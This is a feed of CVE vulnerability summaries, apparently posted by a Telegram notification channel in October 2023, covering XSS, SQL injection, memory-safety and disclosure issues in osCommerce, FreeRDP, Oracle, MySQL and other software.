🚨 CVE-2023-43707Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "CatalogsPageDescriptionForm[1][name]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 05:52:19 |
🚨 CVE-2023-43705Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "translation_value[1]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 05:52:16 |
🚨 CVE-2023-43706Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "email_templates_key" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 05:52:15 |
🚨 CVE-2023-43703Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "product_info[][name]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 05:52:14 |
🚨 CVE-2023-43704Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "title" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 05:52:13 |
🚨 CVE-2023-43735Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "formats_titles[7]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 05:52:12 |
🚨 CVE-2023-43702Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "tracking_number" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 05:52:10 |
🚨 CVE-2023-43734Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "name" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 05:52:09 |
🚨 CVE-2023-43733Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "company_address" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 05:52:08 |
🚨 CVE-2023-43732Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "tax_class_title" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 05:52:07 |
🚨 CVE-2023-43730Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "countries_name[1]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 05:52:06 |
🚨 CVE-2023-43731Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "zone_name" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 05:52:05 |
🚨 CVE-2022-42257NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer (nvidia.ko), where an integer overflow may lead to information disclosure, data tampering or denial of service.🎖@cveNotify |
|
| 2023-10-18 19:22:02 |
🚨 CVE-2023-43250XNSoft Nconvert 7.136 is vulnerable to Buffer Overflow. There is a User Mode Write AV via a crafted image file. Attackers could exploit this issue for a Denial of Service (DoS) or possibly to achieve code execution.🎖@cveNotify |
|
| 2023-10-18 19:22:01 |
🚨 CVE-2023-45383In the module "SoNice etiquetage" (sonice_etiquetage) up to version 2.5.9 from Common-Services for PrestaShop, a guest can download personal information without restriction by performing a path traversal attack. Due to a lack of permissions control and a lack of control in the path name construction, a guest can perform a path traversal to view all files on the information system.🎖@cveNotify |
|
| 2023-10-18 19:22:00 |
🚨 CVE-2023-46009gifsicle-1.94 was found to have a floating point exception (FPE) vulnerability via resize_stream at src/xform.c.🎖@cveNotify |
|
| 2023-10-18 19:21:59 |
🚨 CVE-2023-5642Advantech R-SeeNet v2.4.23 allows an unauthenticated remote attacker to read from and write to the snmpmon.ini file, which contains sensitive information.🎖@cveNotify |
|
| 2023-10-18 19:21:58 |
🚨 CVE-2023-20261A vulnerability in the web UI of Cisco Catalyst SD-WAN Manager could allow an authenticated, remote attacker to retrieve arbitrary files from an affected system. This vulnerability is due to improper validation of parameters that are sent to the web UI. An attacker could exploit this vulnerability by logging in to Cisco Catalyst SD-WAN Manager and issuing crafted requests using the web UI. A successful exploit could allow the attacker to obtain arbitrary files from the underlying Linux file system of an affected system. To exploit this vulnerability, the attacker must be an authenticated user.🎖@cveNotify |
|
| 2023-10-18 19:12:26 |
https://t.me/malwr |
|
| 2023-10-18 14:52:27 |
🚨 CVE-2023-46004Sourcecodester Best Courier Management System 1.0 is vulnerable to Arbitrary file upload in the update_user function.🎖@cveNotify |
|
| 2023-10-18 14:52:26 |
🚨 CVE-2023-46005Sourcecodester Best Courier Management System 1.0 is vulnerable to SQL Injection via the parameter id in /edit_branch.php.🎖@cveNotify |
|
| 2023-10-18 14:52:24 |
🚨 CVE-2023-46006Sourcecodester Best Courier Management System 1.0 is vulnerable to SQL Injection via the parameter id in /edit_user.php.🎖@cveNotify |
|
| 2023-10-18 14:52:22 |
🚨 CVE-2023-46007Sourcecodester Best Courier Management System 1.0 is vulnerable to SQL Injection via the parameter id in /edit_staff.php.🎖@cveNotify |
|
| 2023-10-18 14:52:20 |
🚨 CVE-2023-40181FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. Affected versions are subject to an Integer-Underflow leading to Out-Of-Bound Read in the `zgfx_decompress_segment` function. In the context of `CopyMemory`, it's possible to read data beyond the transmitted packet range and likely cause a crash. This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-10-18 14:52:18 |
🚨 CVE-2023-39356FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. In affected versions a missing offset validation may lead to an Out Of Bound Read in the function `gdi_multi_opaque_rect`. In particular there is no code to validate if the value `multi_opaque_rect->numRectangles` is less than 45. Looping through `multi_opaque_rect->`numRectangles without proper boundary checks can lead to Out-of-Bounds Read errors which will likely lead to a crash. This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-10-18 14:52:16 |
🚨 CVE-2023-39353FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. Affected versions are subject to a missing offset validation leading to Out Of Bound Read. In the `libfreerdp/codec/rfx.c` file there is no offset validation in `tile->quantIdxY`, `tile->quantIdxCb`, and `tile->quantIdxCr`. As a result crafted input can lead to an out of bounds read access which in turn will cause a crash. This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-10-18 14:52:14 |
🚨 CVE-2023-41335Synapse is an open-source Matrix homeserver written and maintained by the Matrix.org Foundation. When users update their passwords, the new credentials may be briefly held in the server database. While this doesn't grant the server any added capabilities—it already learns the users' passwords as part of the authentication process—it does disrupt the expectation that passwords won't be stored in the database. As a result, these passwords could inadvertently be captured in database backups for a longer duration. These temporarily stored passwords are automatically erased after a 48-hour window. This issue has been addressed in version 1.93.0. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-10-18 14:52:12 |
🚨 CVE-2023-42453Synapse is an open-source Matrix homeserver written and maintained by the Matrix.org Foundation. Users were able to forge read receipts for any event (if they knew the room ID and event ID). Note that the users were not able to view the events, but simply mark it as read. This could be confusing as clients will show the event as read by the user, even if they are not in the room. This issue has been patched in version 1.93.0. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-10-18 14:52:10 |
🚨 CVE-2023-40569FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. Affected versions are subject to an Out-Of-Bounds Write in the `progressive_decompress` function. This issue is likely down to incorrect calculations of the `nXSrc` and `nYSrc` variables. This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. there are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-10-18 14:52:08 |
🚨 CVE-2023-40567FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. Affected versions are subject to an Out-Of-Bounds Write in the `clear_decompress_bands_data` function in which there is no offset validation. Abuse of this vulnerability may lead to an out of bounds write. This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. there are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-10-18 14:52:07 |
🚨 CVE-2023-42822xrdp is an open source remote desktop protocol server. Access to the font glyphs in xrdp_painter.c is not bounds-checked . Since some of this data is controllable by the user, this can result in an out-of-bounds read within the xrdp executable. The vulnerability allows an out-of-bounds read within a potentially privileged process. On non-Debian platforms, xrdp tends to run as root. Potentially an out-of-bounds write can follow the out-of-bounds read. There is no denial-of-service impact, providing xrdp is running in forking mode. This issue has been addressed in release 0.9.23.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-10-18 14:52:05 |
🚨 CVE-2023-5499Information exposure vulnerability in Shenzhen Reachfar v28, the exploitation of which could allow a remote attacker to retrieve all the week's logs stored in the 'log2' directory. An attacker could retrieve sensitive information such as remembered wifi networks, sent messages, SOS device locations and device configurations.🎖@cveNotify |
|
| 2023-10-18 14:52:04 |
🚨 CVE-2023-5562An unsafe default configuration in KNIME Analytics Platform before 5.2.0 allows for a cross-site scripting attack. When KNIME Analytics Platform is used as an executor for either KNIME Server or KNIME Business Hub several JavaScript-based view nodes do not sanitize the data that is displayed by default. If the data to be displayed contains JavaScript this code is executed in the browser and can perform any operations that the current user is allowed to perform silently.KNIME Analytics Platform already has configuration options with which sanitization of data can be actived, see https://docs.knime.com/latest/webportal_admin_guide/index.html#html-sanitization-webportal https://docs.knime.com/latest/webportal_admin_guide/index.html#html-sanitization-webportal . However, these are off by default which allows for cross-site scripting attacks.KNIME Analytics Platform 5.2.0 will enable sanitization by default. For all previous releases we recommend users to add the corresponding settings to the executor's knime.ini.🎖@cveNotify |
|
| 2023-10-18 14:52:02 |
🚨 CVE-2023-45510tsMuxer version git-2539d07 was discovered to contain an alloc-dealloc-mismatch (operator new [] vs operator delete) error.🎖@cveNotify |
|
| 2023-10-18 14:52:01 |
🚨 CVE-2023-45511A memory leak in tsMuxer version git-2539d07 allows attackers to cause a Denial of Service (DoS) via a crafted MP4 file.🎖@cveNotify |
|
| 2023-10-18 14:51:59 |
🚨 CVE-2023-32087Pega Platform versions 8.1 to Infinity 23.1.0 are affected by an XSS issue with task creation🎖@cveNotify |
|
| 2023-10-18 14:51:58 |
🚨 CVE-2023-32088Pega Platform versions 8.1 to Infinity 23.1.0 are affected by an XSS issue with ad-hoc case creation🎖@cveNotify |
|
| 2023-10-18 14:51:57 |
🚨 CVE-2023-32089Pega Platform versions 8.1 to 8.8.2 are affected by an XSS issue with Pin description🎖@cveNotify |
|
| 2023-10-18 05:52:23 |
🚨 CVE-2023-26116Versions of the package angular from 1.2.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the angular.copy() utility function due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.🎖@cveNotify |
|
| 2023-10-18 05:52:22 |
🚨 CVE-2023-23581A denial-of-service vulnerability exists in the vpnserver EnSafeHttpHeaderValueStr functionality of SoftEther VPN 5.01.9674 and 5.02. A specially crafted network packet can lead to denial of service.🎖@cveNotify |
|
| 2023-10-18 05:52:21 |
🚨 CVE-2023-22308An integer underflow vulnerability exists in the vpnserver OvsProcessData functionality of SoftEther VPN 5.01.9674 and 5.02. A specially crafted network packet can lead to denial of service. An attacker can send a malicious packet to trigger this vulnerability.🎖@cveNotify |
|
| 2023-10-18 05:52:20 |
🚨 CVE-2023-45132NAXSI is an open-source maintenance web application firewall (WAF) for NGINX. An issue present starting in version 1.3 and prior to version 1.6 allows someone to bypass the WAF when a malicious `X-Forwarded-For` IP matches `IgnoreIP` `IgnoreCIDR` rules. This old code was arranged to allow older NGINX versions to also support `IgnoreIP` `IgnoreCIDR` when multiple reverse proxies were present. The issue is patched in version 1.6. As a workaround, do not set any `IgnoreIP` `IgnoreCIDR` for older versions.🎖@cveNotify |
|
| 2023-10-18 05:52:19 |
🚨 CVE-2023-41882vantage6 is privacy preserving federated learning infrastructure. The endpoint /api/collaboration/{id}/task is used to collect all tasks from a certain collaboration. To get such tasks, a user should have permission to view the collaboration and to view the tasks in it. However, prior to version 4.0.0, it is only checked if the user has permission to view the collaboration. Version 4.0.0 contains a patch. There are no known workarounds.🎖@cveNotify |
|
| 2023-10-18 05:52:17 |
🚨 CVE-2023-41881vantage6 is privacy preserving federated learning infrastructure. When a collaboration is deleted, the linked resources (such as tasks from that collaboration) should be deleted. This is partly to manage data properly, but also to prevent a potential (but unlikely) side-effect that affects versions prior to 4.0.0, where if a collaboration with id=10 is deleted, and subsequently a new collaboration is created with id=10, the authenticated users in that collaboration could potentially see results of the deleted collaboration in some cases. Version 4.0.0 contains a patch for this issue. There are no known workarounds.🎖@cveNotify |
|
| 2023-10-18 05:52:16 |
🚨 CVE-2023-30801All versions of the qBittorrent client through 4.5.5 use default credentials when the web user interface is enabled. The administrator is not forced to change the default credentials. As of 4.5.5, this issue has not been fixed. A remote attacker can use the default credentials to authenticate and execute arbitrary operating system commands using the "external program" feature in the web user interface. This was reportedly exploited in the wild in March 2023.🎖@cveNotify |
|
| 2023-10-18 05:52:15 |
🚨 CVE-2023-4966Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.🎖@cveNotify |
|
| 2023-10-18 05:52:14 |
🚨 CVE-2023-43661Cachet, the open-source status page system. Prior to the 2.4 branch, a template functionality which allows users to create templates allows them to execute any code on the server during the bad filtration and old twig version. Commit 6fb043e109d2a262ce3974e863c54e9e5f5e0587 of the 2.4 branch contains a patch for this issue.🎖@cveNotify |
|
| 2023-10-18 05:52:10 |
🚨 CVE-2023-3781there is a possible use-after-free write due to improper locking. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-10-18 05:52:09 |
🚨 CVE-2023-40142In TBD of TBD, there is a possible way to bypass carrier restrictions due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-10-18 05:52:08 |
🚨 CVE-2023-40141In temp_residency_name_store of thermal_metrics.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-10-18 05:52:07 |
🚨 CVE-2023-35661In ProfSixDecomTcpSACKoption of RohcPacketCommon.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-10-18 05:52:03 |
🚨 CVE-2023-35660In lwis_transaction_client_cleanup of lwis_transaction.c, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-10-18 05:52:02 |
🚨 CVE-2023-43611The BIG-IP Edge Client Installer on macOS does not follow best practices for elevating privileges during the installation process. This vulnerability is due to an incomplete fix for CVE-2023-38418. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated🎖@cveNotify |
|
| 2023-10-18 05:52:01 |
🚨 CVE-2023-45219Exposure of Sensitive Information vulnerability exist in an undisclosed BIG-IP TMOS shell (tmsh) command which may allow an authenticated attacker with resource administrator role privileges to view sensitive information. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-10-18 05:52:00 |
🚨 CVE-2023-5552A password disclosure vulnerability in the Secure PDF eXchange (SPX) feature allows attackers with full email access to decrypt PDFs in Sophos Firewall version 19.5 MR3 (19.5.3) and older, if the password type is set to “Specified by sender”.🎖@cveNotify |
|
| 2023-10-18 05:51:59 |
🚨 CVE-2023-5626Cross-Site Request Forgery (CSRF) in GitHub repository pkp/ojs prior to 3.3.0-16.🎖@cveNotify |
|
| 2023-10-18 01:22:21 |
🚨 CVE-2023-41715SonicOS post-authentication Improper Privilege Management vulnerability in the SonicOS SSL VPN Tunnel allows users to elevate their privileges inside the tunnel.🎖@cveNotify |
|
| 2023-10-18 01:22:20 |
🚨 CVE-2023-42506Improper restriction of operations within the bounds of a memory buffer issue exists in OnSinView2 versions 2.0.1 and earlier. If this vulnerability is exploited, information may be disclosed or arbitrary code may be executed by having a user open a specially crafted OnSinView2 project file.🎖@cveNotify |
|
| 2023-10-18 01:22:19 |
🚨 CVE-2023-42507Stack-based buffer overflow vulnerability exists in OnSinView2 versions 2.0.1 and earlier. If this vulnerability is exploited, information may be disclosed or arbitrary code may be executed by having a user open a specially crafted OnSinView2 project file.🎖@cveNotify |
|
| 2023-10-18 01:22:17 |
🚨 CVE-2023-45810OpenFGA is a flexible authorization/permission engine built for developers and inspired by Google Zanzibar. Affected versions of OpenFGA are vulnerable to a denial of service attack. When a number of `ListObjects` calls are executed, in some scenarios, those calls are not releasing resources even after a response has been sent, and given a sufficient call volume the service as a whole becomes unresponsive. This issue has been addressed in version 1.3.4 and the upgrade is considered backwards compatible. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-10-18 01:22:16 |
🚨 CVE-2023-45811Synchrony deobfuscator is a javascript cleaner & deobfuscator. A `__proto__` pollution vulnerability exists in versions before v2.4.4. Successful exploitation could lead to arbitrary code execution. A `__proto__` pollution vulnerability exists in the `LiteralMap` transformer allowing crafted input to modify properties in the Object prototype. A fix has been released in `deobfuscator@2.4.4`. Users are advised to upgrade. Users unable to upgrade should launch node with the [--disable-proto=delete][disable-proto] or [--disable-proto=throw][disable-proto] flags🎖@cveNotify |
|
| 2023-10-18 01:22:15 |
🚨 CVE-2023-22025Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u381-perf, 17.0.8, 20.0.2; Oracle GraalVM for JDK: 17.0.8 and 20.0.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-10-18 01:22:14 |
🚨 CVE-2023-22067Vulnerability in Oracle Java SE (component: CORBA). Supported versions that are affected are Oracle Java SE: 8u381 and 8u381-perf. Easily exploitable vulnerability allows unauthenticated attacker with network access via CORBA to compromise Oracle Java SE. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE accessible data. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-10-18 01:22:12 |
🚨 CVE-2023-22072Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).🎖@cveNotify |
|
| 2023-10-18 01:22:11 |
🚨 CVE-2023-22026Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.7.42 and prior and 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-10-18 01:22:10 |
🚨 CVE-2023-22032Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.34 and prior and 8.1.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-10-18 01:22:09 |
🚨 CVE-2023-22064Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.34 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-10-18 01:22:07 |
🚨 CVE-2023-22015Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.7.42 and prior and 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-10-18 01:22:06 |
🚨 CVE-2023-22066Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.34 and prior and 8.1.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-10-18 01:22:05 |
🚨 CVE-2023-22066Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.34 and prior and 8.1.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-10-18 01:22:04 |
🚨 CVE-2023-22068Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.34 and prior and 8.1.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-10-18 01:22:02 |
🚨 CVE-2023-22019Vulnerability in the Oracle HTTP Server product of Oracle Fusion Middleware (component: Web Listener). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle HTTP Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle HTTP Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).🎖@cveNotify |
|
| 2023-10-18 01:22:01 |
🚨 CVE-2023-22070Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.34 and prior and 8.1.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-10-18 01:22:00 |
🚨 CVE-2023-22028Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.7.43 and prior and 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-10-18 01:21:59 |
🚨 CVE-2023-22029Vulnerability in the Oracle Commerce Guided Search product of Oracle Commerce (component: Workbench). The supported version that is affected is 11.3.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Commerce Guided Search. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Commerce Guided Search, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Commerce Guided Search accessible data as well as unauthorized read access to a subset of Oracle Commerce Guided Search accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).🎖@cveNotify |
|
| 2023-10-18 01:21:58 |
🚨 CVE-2023-22073Vulnerability in the Oracle Notification Server component of Oracle Database Server. Supported versions that are affected are 19.3-19.20 and 21.3-21.11. Easily exploitable vulnerability allows unauthenticated attacker with access to the physical communication segment attached to the hardware where the Oracle Notification Server executes to compromise Oracle Notification Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Notification Server accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).🎖@cveNotify |
|
| 2023-10-17 23:23:36 |
🚨 CVE-2023-45952An arbitrary file upload vulnerability in the component ajax_link.php of lylme_spage v1.7.0 allows attackers to execute arbitrary code via uploading a crafted file.🎖@cveNotify |
|
| 2023-10-17 23:23:35 |
🚨 CVE-2023-4896A vulnerability exists which allows an authenticated attacker to access sensitive information on the AirWave Management Platform web-based management interface. Successful exploitation allows the attacker to gain access to some data that could be further exploited to laterally access devices managed and monitored by the AirWave server.🎖@cveNotify |
|
| 2023-10-17 23:23:34 |
🚨 CVE-2023-27132TSplus Remote Work 16.0.0.0 places a cleartext password on the "var pass" line of the HTML source code for the secure single sign-on web portal. NOTE: CVE-2023-31069 is only about the TSplus Remote Access product, not the TSplus Remote Work product.🎖@cveNotify |
|
| 2023-10-17 23:23:32 |
🚨 CVE-2023-27133TSplus Remote Work 16.0.0.0 has weak permissions for .exe, .js, and .html files under the %PROGRAMFILES(X86)%\TSplus-RemoteWork\Clients\www folder. This may enable privilege escalation if a different local user modifies a file. NOTE: CVE-2023-31067 and CVE-2023-31068 are only about the TSplus Remote Access product, not the TSplus Remote Work product.🎖@cveNotify |
|
| 2023-10-17 23:23:31 |
🚨 CVE-2023-37537An unquoted service path vulnerability in HCL AppScan Presence, deployed as a Windows service in HCL AppScan on Cloud (ASoC), may allow a local attacker to gain elevated privileges.🎖@cveNotify |
|
| 2023-10-17 23:23:30 |
🚨 CVE-2023-42768When a non-admin user has been assigned an administrator role via an iControl REST PUT request and later the user's role is reverted back to a non-admin role via the Configuration utility, tmsh, or iControl REST. BIG-IP non-admin user can still have access to iControl REST admin resource. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-10-17 23:23:29 |
🚨 CVE-2023-41964The BIG-IP and BIG-IQ systems do not encrypt some sensitive information written to Database (DB) variables. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-10-17 23:23:28 |
